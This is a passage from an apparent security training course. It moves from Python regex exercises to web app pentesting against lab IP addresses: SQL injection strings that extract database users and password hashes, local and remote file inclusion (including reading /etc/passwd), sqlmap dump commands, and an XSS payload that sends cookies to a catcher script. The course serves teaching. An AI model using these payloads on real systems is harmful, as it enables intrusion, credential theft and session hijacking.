2379. ['P', 'y', 't', 'h', 'o', 'n', ' ', 'i', 's', ' ', 't', 'h', 'e', ' ', 'b', 'e', 's', 't', ' ', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', ' ', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']
2380.  
2381.  
2382. Above, space is also extracted, now to avoid it use "\w" instead of ".".
2383.  
2384.  
2385. Code
2386. ---------------------------Type This-----------------------------------
2387.  
2388. import re
2389. result=re.findall(r'\w','Python is the best scripting language')
2390. print (result)
2391.  
2392. ----------------------------------------------------------------------
2393.  
2394. Output:
2395. ['P', 'y', 't', 'h', 'o', 'n', 'i', 's', 't', 'h', 'e', 'b', 'e', 's', 't', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']
2396.  
2397.  
2398.  
2399.  
2400. Solution-2  Extract each word (using "*" or "+")
2401. ---------------------------------------------------------------------------
2402.  
2403. Code
2404. ---------------------------Type This-----------------------------------
2405.  
2406. import re
2407. result=re.findall(r'\w*','Python is the best scripting language')
2408. print (result)
2409.  
2410. ----------------------------------------------------------------------
2411.  
2412. Output:
2413. ['Python', '', 'is', '', 'the', '', 'best', '', 'scripting', '', 'language', '']
2414.  
2415.  
2416. Again, it is returning space as a word because "*" returns zero or more matches of pattern to its left. Now to remove spaces we will go with "+".
2417.  
2418. Code
2419. ---------------------------Type This-----------------------------------
2420.  
2421. import re
2422. result=re.findall(r'\w+','Python is the best scripting language')
2423. print (result)
2424.  
2425. ----------------------------------------------------------------------
2426.  
2427. Output:
2428. ['Python', 'is', 'the', 'best', 'scripting', 'language']
2429.  
2430.  
2431.  
2432.  
2433. Solution-3 Extract each word (using "^")
2434. -------------------------------------------------------------------------------------
2435.  
2436.  
2437. Code
2438. ---------------------------Type This-----------------------------------
2439.  
2440. import re
2441. result=re.findall(r'^\w+','Python is the best scripting language')
2442. print (result)
2443.  
2444. ----------------------------------------------------------------------
2445.  
2446. Output:
2447. ['Python']
2448.  
2449. If we will use "$" instead of "^", it will return the word from the end of the string. Let's look at it.
2450.  
2451. Code
2452. ---------------------------Type This-----------------------------------
2453.  
2454. import re
2455. result=re.findall(r'\w+$','Python is the best scripting language')
2456. print (result)
2457. ----------------------------------------------------------------------
2458.  
2459. Output:
2460. [‘language']
2461.  
2462.  
2463.  
2464.  
2465.  
2466. **********************************************************
2467. * Problem 2: Return the first two character of each word *
2468. **********************************************************
2469.  
2470.  
2471.  
2472.  
2473. Solution-1  Extract consecutive two characters of each word, excluding spaces (using "\w")
2474. ------------------------------------------------------------------------------------------------------
2475.  
2476. Code
2477. ---------------------------Type This-----------------------------------
2478.  
2479. import re
2480. result=re.findall(r'\w\w','Python is the best')
2481. print (result)
2482.  
2483. ----------------------------------------------------------------------
2484.  
2485. Output:
2486. ['Py', 'th', 'on', 'is', 'th', 'be', 'st']
2487.  
2488.  
2489.  
2490.  
2491.  
2492. Solution-2  Extract consecutive two characters those available at start of word boundary (using "\b")
2493. ------------------------------------------------------------------------------------------------------
2494.  
2495. Code
2496. ---------------------------Type This-----------------------------------
2497.  
2498. import re
2499. result=re.findall(r'\b\w.','Python is the best')
2500. print (result)
2501.  
2502. ----------------------------------------------------------------------
2503.  
2504. Output:
2505. ['Py', 'is', 'th', 'be']
2506.  
2507.  
2508.  
2509.  
2510.  
2511.  
2512. ********************************************************
2513. * Problem 3: Return the domain type of given email-ids *
2514. ********************************************************
2515.  
2516.  
2517. To explain it in simple manner, I will again go with a stepwise approach:
2518.  
2519.  
2520.  
2521.  
2522.  
2523. Solution-1  Extract all characters after "@"
2524. ------------------------------------------------------------------------------------------------------------------
2525.  
2526. Code
2527. ---------------------------Type This-----------------------------------
2528.  
2529. import re
2530. result=re.findall(r'@\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
2531. print (result)
2532. ----------------------------------------------------------------------
2533.  
2534. Output: ['@gmail', '@test', '@strategicsec', '@rest']
2535.  
2536.  
2537.  
2538. Above, you can see that ".com", ".biz" part is not extracted. To add it, we will go with below code.
2539.  
2540. ---------------------------Type This-----------------------------------
2541.  
2542. import re
2543. result=re.findall(r'@\w+.\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
2544. print (result)
2545.  
2546. ----------------------------------------------------------------------
2547.  
2548. Output:
2549. ['@gmail.com', '@test.com', '@strategicsec.com', '@rest.biz']
2550.  
2551.  
2552.  
2553.  
2554.  
2555.  
2556. Solution – 2 Extract only domain name using "( )"
2557. -----------------------------------------------------------------------------------------------------------------------
2558.  
2559.  
2560. Code
2561. ---------------------------Type This-----------------------------------
2562.  
2563. import re
2564. result=re.findall(r'@\w+.(\w+)','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
2565. print (result)
2566.  
2567. ----------------------------------------------------------------------
2568.  
2569. Output:
2570. ['com', 'com', 'com', 'biz']
2571.  
2572.  
2573.  
2574. ********************************************
2575. * Problem 4: Return date from given string *
2576. ********************************************
2577.  
2578.  
2579. Here we will use "\d" to extract digit.
2580.  
2581.  
2582. Solution:
2583. ----------------------------------------------------------------------------------------------------------------------
2584.  
2585. Code
2586. ---------------------------Type This-----------------------------------
2587.  
2588. import re
2589.  
2590. result=re.findall(r'\d{2}-\d{2}-\d{4}','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')
2591. print (result)
2592.  
2593. ----------------------------------------------------------------------
2594.  
2595. Output:
2596. ['12-05-2007', '11-11-2016', '12-01-2009']
2597.  
2598. If you want to extract only year again parenthesis "( )" will help you.
2599.  
2600.  
2601. Code
2602.  
2603. ---------------------------Type This-----------------------------------
2604.  
2605. import re
2606. result=re.findall(r'\d{2}-\d{2}-(\d{4})','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')
2607. print (result)
2608.  
2609. ----------------------------------------------------------------------
2610.  
2611. Output:
2612. ['2007', '2016', '2009']
2613.  
2614.  
2615.  
2616.  
2617.  
2618. *******************************************************************
2619. * Problem 5: Return all words of a string those starts with vowel *
2620. *******************************************************************
2621.  
2622.  
2623.  
2624.  
2625. Solution-1  Return each words
2626. -----------------------------------------------------------------------------------------------------------------
2627.  
2628. Code
2629. ---------------------------Type This-----------------------------------
2630.  
2631. import re
2632. result=re.findall(r'\w+','Python is the best')
2633. print (result)
2634. ----------------------------------------------------------------------
2635.  
2636. Output:
2637. ['Python', 'is', 'the', 'best']
2638.  
2639.  
2640.  
2641.  
2642.  
2643. Solution-2  Return words starts with alphabets (using [])
2644. ------------------------------------------------------------------------------------------------------------------
2645.  
2646. Code
2647. ---------------------------Type This-----------------------------------
2648.  
2649. import re
2650. result=re.findall(r'[aeiouAEIOU]\w+','I love Python')
2651. print (result)
2652.  
2653. ----------------------------------------------------------------------
2654.  
2655. Output:
2656. ['ove', 'on']
2657.  
2658. Above you can see that it has returned "ove" and "on" from the mid of words. To drop these two, we need to use "\b" for word boundary.
2659.  
2660.  
2661.  
2662.  
2663.  
2664. Solution- 3
2665. ------------------------------------------------------------------------------------------------------------------
2666.  
2667. Code
2668. ---------------------------Type This-----------------------------------
2669.  
2670. import re
2671. result=re.findall(r'\b[aeiouAEIOU]\w+','I love Python')
2672. print (result)
2673.  
2674. ----------------------------------------------------------------------
2675.  
2676. Output:
2677. []
2678.  
2679. In similar ways, we can extract words those starts with constant using "^" within square bracket.
2680.  
2681.  
2682. Code
2683. ---------------------------Type This-----------------------------------
2684.  
2685. import re
2686. result=re.findall(r'\b[^aeiouAEIOU]\w+','I love Python')
2687. print (result)
2688.  
2689. ----------------------------------------------------------------------
2690.  
2691. Output:
2692. [' love', ' Python']
2693.  
2694. Above you can see that it has returned words starting with space. To drop it from output, include space in square bracket[].
2695.  
2696.  
2697. Code
2698. ---------------------------Type This-----------------------------------
2699.  
2700. import re
2701. result=re.findall(r'\b[^aeiouAEIOU ]\w+','I love Python')
2702. print (result)
2703.  
2704. ----------------------------------------------------------------------
2705.  
2706. Output:
2707. ['love', 'Python']
2708.  
2709.  
2710.  
2711.  
2712.  
2713.  
2714. *************************************************************************************************
2715. * Problem 6: Validate a phone number (phone number must be of 10 digits and starts with 8 or 9) *
2716. *************************************************************************************************
2717.  
2718.  
2719. We have a list phone numbers in list "li" and here we will validate phone numbers using regular
2720.  
2721.  
2722.  
2723.  
2724. Solution
2725. -------------------------------------------------------------------------------------------------------------------------------------
2726.  
2727.  
2728. Code
2729. ---------------------------Type This-----------------------------------
2730.  
2731. import re
2732. li=['9999999999','999999-999','99999x9999']
2733. for val in li:
2734. if re.match(r'[8-9]{1}[0-9]{9}',val) and len(val) == 10:
2735.     print ('yes')
2736. else:
2737.     print ('no')
2738.  
2739.  
2740. ----------------------------------------------------------------------
2741.  
2742. Output:
2743. yes
2744. no
2745. no
2746.  
2747.  
2748.  
2749.  
2750.  
2751. ******************************************************
2752. * Problem 7: Split a string with multiple delimiters *
2753. ******************************************************
2754.  
2755.  
2756.  
2757. Solution
2758. ---------------------------------------------------------------------------------------------------------------------------
2759.  
2760.  
2761. Code
2762. ---------------------------Type This-----------------------------------
2763.  
2764. import re
2765. line = 'asdf fjdk;afed,fjek,asdf,foo' # String has multiple delimiters (";",","," ").
2766. result= re.split(r'[;,\s]', line)
2767. print (result)
2768.  
2769. ----------------------------------------------------------------------
2770.  
2771. Output:
2772. ['asdf', 'fjdk', 'afed', 'fjek', 'asdf', 'foo']
2773.  
2774.  
2775.  
2776. We can also use method re.sub() to replace these multiple delimiters with one as space " ".
2777.  
2778.  
2779. Code
2780. ---------------------------Type This-----------------------------------
2781.  
2782. import re
2783. line = 'asdf fjdk;afed,fjek,asdf,foo'
2784. result= re.sub(r'[;,\s]',' ', line)
2785. print (result)
2786.  
2787. ----------------------------------------------------------------------
2788.  
2789. Output:
2790. asdf fjdk afed fjek asdf foo
2791.  
2792.  
2793.  
2794.  
2795. **************************************************
2796. * Problem 8: Retrieve Information from HTML file *
2797. **************************************************
2798.  
2799.  
2800.  
2801. I want to extract information from a HTML file (see below sample data). Here we need to extract information available between <td> and </td> except the first numerical index. I have assumed here that below html code is stored in a string str.
2802.  
2803.  
2804.  
2805. Create a file that contains the following data:
2806. ---------------------------Paste This-----------------------------------
2807.  
2808. <tr align="center"><td>1</td> <td>Noah</td> <td>Emma</td></tr>
2809. <tr align="center"><td>2</td> <td>Liam</td> <td>Olivia</td></tr>
2810. <tr align="center"><td>3</td> <td>Mason</td> <td>Sophia</td></tr>
2811. <tr align="center"><td>4</td> <td>Jacob</td> <td>Isabella</td></tr>
2812. <tr align="center"><td>5</td> <td>William</td> <td>Ava</td></tr>
2813. <tr align="center"><td>6</td> <td>Ethan</td> <td>Mia</td></tr>
2814. <tr align="center"><td>7</td> <td HTML>Michael</td> <td>Emily</td></tr>
2815. ----------------------------------------------------------------------
2816.  
2817. Solution:
2818.  
2819.  
2820.  
2821. Code
2822. ---------------------------Type This-----------------------------------
2823.  
2824. f=open('file.txt', "r")
2825. import re
2826. str = f.read()
2827. result=re.findall(r'<td>\w+</td>\s<td>(\w+)</td>\s<td>(\w+)</td>',str)
2828. print (result)
2829. ----------------------------------------------------------------------
2830.  
2831. Output:
2832. [('Noah', 'Emma'), ('Liam', 'Olivia'), ('Mason', 'Sophia'), ('Jacob', 'Isabella'), ('William', 'Ava'), ('Ethan', 'Mia'), ('Michael', 'Emily')]
2833.  
2834.  
2835.  
2836. You can read html file using library urllib2 (see below code).
2837.  
2838.  
2839. Code
2840. ---------------------------Type This-----------------------------------
2841.  
2842. import urllib2
2843. response = urllib2.urlopen('')
2844. html = response.read()
2845. ----------------------------------------------------------------------
2846. NOTE: You can put any website URL that you want in the urllib2.urlopen('')
2847.  
2848.  
2849.  
2850.  
2851. ##################################
2852. # Day 2 Homework videos to watch #
2853. ##################################
2854. Here is your first set of youtube videos that I'd like for you to watch:
2855. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20)
2856.  
2857.  
2858.  
2859.  
2860.  
2861.  
2862.  
2863.  
2864.  
2865.  
2866.                             ###############################################################
2867. ----------- ############### # Day 3: Web App Pentesting, PW Cracking and more with Python # ############### -----------
2868.                             ###############################################################
2869.  
2870. ##################################
2871. # Basic: Web Application Testing #
2872. ##################################
2873.  
2874. Most people are going to tell you reference the OWASP Testing guide.
2875. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
2876.  
2877. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
2878.  
2879.  
2880. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
2881.    
2882.     1. Does the website talk to a DB?
2883.         - Look for parameter passing (ex: site.com/page.php?id=4)
2884.         - If yes - try SQL Injection
2885.  
2886.     2. Can I or someone else see what I type?
2887.         - If yes - try XSS
2888.  
2889.     3. Does the page reference a file?
2890.         - If yes - try LFI/RFI
2891.  
2892. Let's start with some manual testing against 45.63.104.73
2893.  
2894.  
2895. #######################
2896. # Attacking PHP/MySQL #
2897. #######################
2898.  
2899. Go to LAMP Target homepage
2900. http://45.63.104.73/
2901.  
2902.  
2903.  
2904. Clicking on the Acer Link:
2905. http://45.63.104.73/acre2.php?lap=acer
2906.  
2907.    - Found parameter passing (answer yes to question 1)
2908.    - Insert ' to test for SQLI
2909.  
2910. ---------------------------Type This-----------------------------------
2911.  
2912. http://45.63.104.73/acre2.php?lap=acer'
2913.  
2914. -----------------------------------------------------------------------
2915.  
2916. Page returns the following error:
2917. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''acer''' at line 1
2918.  
2919.  
2920.  
2921. In order to perform union-based sql injection - we must first determine the number of columns in this query.
2922. We do this using the ORDER BY
2923.  
2924. ---------------------------Type This-----------------------------------
2925.  
2926. http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
2927. -----------------------------------------------------------------------
2928.  
2929. Page returns the following error:
2930. Unknown column '100' in 'order clause'
2931.  
2932.  
2933. ---------------------------Type This-----------------------------------
2934.  
2935. http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
2936. -----------------------------------------------------------------------
2937.  
2938. Page returns the following error:
2939. Unknown column '50' in 'order clause'
2940.  
2941.  
2942. ---------------------------Type This-----------------------------------
2943.  
2944. http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
2945. -----------------------------------------------------------------------
2946.  
2947. Page returns the following error:
2948. Unknown column '25' in 'order clause'
2949.  
2950.  
2951. ---------------------------Type This-----------------------------------
2952.  
2953. http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
2954. -----------------------------------------------------------------------
2955.  
2956. Page returns the following error:
2957. Unknown column '12' in 'order clause'
2958.  
2959.  
2960. ---------------------------Type This-----------------------------------
2961.  
2962. http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
2963. -----------------------------------------------------------------------
2964.  
2965. ---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
2966.  
2967.  
2968.  
2969. Now we build out the union all select statement with the correct number of columns
2970.  
2971. Reference:
2972. http://www.techonthenet.com/sql/union.php
2973.  
2974.  
2975. ---------------------------Type This-----------------------------------
2976.  
2977. http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
2978. -----------------------------------------------------------------------
2979.  
2980.  
2981.  
2982. Now we negate the parameter value 'acer' by turning into the word 'null':
2983. ---------------------------Type This-----------------------------------
2984.  
2985. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
2986. -----------------------------------------------------------------------
2987.  
2988. We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
2989.  
2990.  
2991. Use a cheat sheet for syntax:
2992. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
2993.  
2994. ---------------------------Type This-----------------------------------
2995.  
2996. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
2997.  
2998. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
2999.  
3000. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
3001.  
3002. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
3003.  
3004.  
3005. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
3006.  
3007. -----------------------------------------------------------------------
3008.  
3009.  
3010.  
3011. ########################
3012. # Question I get a lot #
3013. ########################
3014. Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
3015.  
3016. Here is a good reference for it:
3017. https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
3018.  
3019. Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
3020.  
3021.  
3022.  
3023.  
3024. #########################
3025. # File Handling Attacks #
3026. #########################
3027.  
3028. Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
3029.  
3030. ---------------------------Type This-----------------------------------
3031.  
3032. http://45.63.104.73/showfile.php?filename=about.txt
3033.  
3034. -----------------------------------------------------------------------
3035.  
3036.  
3037. See if you can read files on the file system:
3038. ---------------------------Type This-----------------------------------
3039.  
3040. http://45.63.104.73/showfile.php?filename=/etc/passwd
3041. -----------------------------------------------------------------------
3042.  
3043. We call this attack a Local File Include or LFI.
3044.  
3045. Now let's find some text out on the internet somewhere:
3046. https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
3047.  
3048.  
3049. Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
3050.  
3051. ---------------------------Type This-----------------------------------
3052.  
3053. http://45.63.104.73/showfile.php?filename=https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
3054. -----------------------------------------------------------------------
3055.  
3056. #########################################################################################
3057. # SQL Injection                                                                         #
3058. # http://45.63.104.73/1-Intro_To_SQL_Intection.pptx #
3059. #########################################################################################
3060.  
3061.  
3062. - Another quick way to test for SQLI is to remove the paramter value
3063.  
3064.  
3065. #############################
3066. # Error-Based SQL Injection #
3067. #############################
3068. ---------------------------Type This-----------------------------------
3069.  
3070. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
3071. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
3072. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
3073. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
3074. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
3075. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))--     NOTE: "N" - just means to keep going until you run out of databases
3076. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
3077. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
3078. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
3079.  
3080. -----------------------------------------------------------------------
3081.  
3082.  
3083.  
3084. #############################
3085. # Union-Based SQL Injection #
3086. #############################
3087.  
3088. ---------------------------Type This-----------------------------------
3089.  
3090. http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
3091. http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
3092. http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
3093. http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
3094. http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
3095. http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
3096. http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
3097. http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
3098. http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
3099. http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
3100. -----------------------------------------------------------------------
3101.  
3102.    We are using a union select statement because we are joining the developer's query with one of our own.
3103.    Reference:
3104.    http://www.techonthenet.com/sql/union.php
3105.    The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
3106.    It removes duplicate rows between the various SELECT statements.
3107.  
3108.    Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
3109.  
3110. ---------------------------Type This-----------------------------------
3111.  
3112. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
3113. -----------------------------------------------------------------------
3114.  
3115.    Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
3116.  
3117. ---------------------------Type This-----------------------------------
3118.  
3119. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
3120. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
3121. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
3122. http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
3123.  
3124. -----------------------------------------------------------------------
3125.  
3126.  
3127.  
3128.  
3129. - Another way is to see if you can get the backend to perform an arithmetic function
3130.  
3131. ---------------------------Type This-----------------------------------
3132.  
3133. http://45.77.162.239/bookdetail.aspx?id=(2)
3134. http://45.77.162.239/bookdetail.aspx?id=(4-2)  
3135. http://45.77.162.239/bookdetail.aspx?id=(4-1)
3136.  
3137.  
3138.  
3139. http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
3140. http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
3141. http://45.77.162.239/bookdetail.aspx?id=1*1
3142. http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
3143. http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
3144. http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
3145. http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
3146. http://45.77.162.239/bookdetail.aspx?id=2 &0#
3147.  
3148.  
3149.  
3150. http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
3151. http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
3152. http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
3153. http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
3154.  
3155. -----------------------------------------------------------------------
3156.  
3157.  
3158. ###############################
3159. # Blind SQL Injection Testing #
3160. ###############################
3161. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
3162.    
3163. 3 - Total Characters
3164. ---------------------------Type This-----------------------------------
3165.  
3166. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
3167. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
3168. http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--      (Ok, the username is 3 chars long - it waited 10 seconds)
3169. -----------------------------------------------------------------------
3170.  
3171. Let's go for a quick check to see if it's DBO
3172.  
3173. ---------------------------Type This-----------------------------------
3174.  
3175. http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
3176. -----------------------------------------------------------------------
3177.  
3178. Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
3179.  
3180. ---------------------------Type This-----------------------------------
3181.  
3182. D  - 1st Character
3183. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--  
3184. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
3185. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
3186. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--  (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
3187.  
3188. B - 2nd Character
3189. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
3190. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
3191.  
3192. O - 3rd Character
3193. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
3194. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
3195. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
3196. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
3197. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
3198. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--      
3199. http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
3200.  
3201. -----------------------------------------------------------------------
3202.  
3203.  
3204.  
3205.  
3206. ####File not Found
3207. ##########
3208. # Sqlmap #
3209. ##########
3210. If you want to see how we automate all of the SQL Injection attacks you can log into your StrategicSec-Ubuntu-VM and run the following commands:
3211.  
3212.  ---------------------------Type This-----------------------------------
3213.  
3214. cd /home/strategicsec/toolz/sqlmap-dev/
3215. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -b
3216. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-user
3217. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-db
3218. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --dbs
3219. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp --tables
3220. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
3221. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
3222. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
3223. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
3224. python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --users --passwords
3225.  
3226. -----------------------------------------------------------------------
3227.  
3228. ###############################################################################
3229. # What is XSS                                                                 #
3230. # http://45.63.104.73/2-Intro_To_XSS.pptx             #
3231. ###############################################################################
3232.  
3233. OK - what is Cross Site Scripting (XSS)
3234.  
3235. 1. Use Firefox to browse to the following location:
3236. ---------------------------Type This-----------------------------------
3237.  
3238.    http://45.63.104.73/xss_practice/
3239. -----------------------------------------------------------------------
3240.  
3241.    A really simple search page that is vulnerable should come up.
3242.  
3243.  
3244.  
3245.  
3246. 2. In the search box type:
3247. ---------------------------Type This-----------------------------------
3248.  
3249.    <script>alert('So this is XSS')</script>
3250. -----------------------------------------------------------------------
3251.  
3252.  
3253.    This should pop-up an alert window with your message in it proving XSS is in fact possible.
3254.    Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
3255.  
3256.  
3257. 3. In the search box type:
3258. ---------------------------Type This-----------------------------------
3259.  
3260.    <script>alert(document.cookie)</script>
3261. -----------------------------------------------------------------------
3262.  
3263.  
3264.    This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
3265.    Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
3266.  
3267. 4. Now replace that alert script with:
3268. ---------------------------Type This-----------------------------------
3269.  
3270.    <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
3271. -----------------------------------------------------------------------
3272.  
3273.  
3274. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
3275.  
3276.  
3277. 5. Now view the stolen cookie at:
3278. ---------------------------Type This-----------------------------------
3279.  
3280.    http://45.63.104.73/xss_practice/cookie_stealer_logs.html
3281. -----------------------------------------------------------------------
3282.  
3283.  
3284. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
3285.  
3286.  
3287.  
3288.  
3289.  
3290.  
3291. ############################
3292. # A Better Way To Demo XSS #
3293. ############################
3294.  
3295.  
